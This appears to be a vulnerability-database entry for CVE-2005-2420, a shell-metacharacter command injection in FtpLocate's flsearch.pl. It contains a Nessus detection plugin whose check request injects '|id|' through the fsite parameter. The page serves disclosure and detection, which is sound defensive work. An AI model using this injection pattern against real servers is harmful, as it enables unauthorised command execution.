Vulnerabilities > CVE-2005-2420 - Remote Command Execution vulnerability in FTPLocate

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
ftplocate
critical
nessus
exploit available

Summary

flsearch.pl in FtpLocate 2.02 allows remote attackers to execute arbitrary commands via shell metacharacters in an HTTP GET request.

Vulnerable Configurations

Part Description Count
Application
Ftplocate
1

Exploit-Db

descriptionFtpLocate <= 2.02 (current) Remote Command Execution Exploit. CVE-2005-2420. Webapps exploit for cgi platform
idEDB-ID:1120
last seen2016-01-31
modified2005-07-25
published2005-07-25
reporternewbug
sourcehttps://www.exploit-db.com/download/1120/
titleFtpLocate <= 2.02 current Remote Command Execution Exploit

Nessus

NASL familyCGI abuses
NASL idFTPLOCATE_FSITE_CMD_EXEC.NASL
descriptionThe remote host is running FtpLocate, a web search engine for FTP sites written in Perl. The installed version of FtpLocate allows remote attackers to execute commands on the remote host by manipulating input to the
last seen2020-06-01
modified2020-06-02
plugin id19300
published2005-07-26
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/19300
titleFtpLocate flsearch.pl fsite Parameter Remote File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(19300);
  script_version("1.16");

  script_cve_id("CVE-2005-2420");
  script_bugtraq_id(14367);

  script_name(english:"FtpLocate flsearch.pl fsite Parameter Remote File Inclusion");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a Perl script that is allows arbitrary
commands to be executed." );
 script_set_attribute(attribute:"description", value:
"The remote host is running FtpLocate, a web search engine for FTP
sites written in Perl. 

The installed version of FtpLocate allows remote attackers to execute
commands on the remote host by manipulating input to the 'fsite'
parameter in various scripts." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/406373/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/26");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/25");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
  script_summary(english:"Checks for fsite parameter command execution vulnerability in FtpLocate");
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include('global_settings.inc');
include("misc_func.inc");
include("http.inc");

if (thorough_tests) 
  extra_list = make_list("/ftplocate", "/cgi-bin/ftplocate");
else 
  extra_list = NULL;

http_check_remote_code (
			extra_dirs: extra_list,
			check_request:"/flserv.pl?cmd=exec_flsearch&query=" + SCRIPT_NAME + "&fsite=|id|",
			extra_check:"cache hit",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id"
			);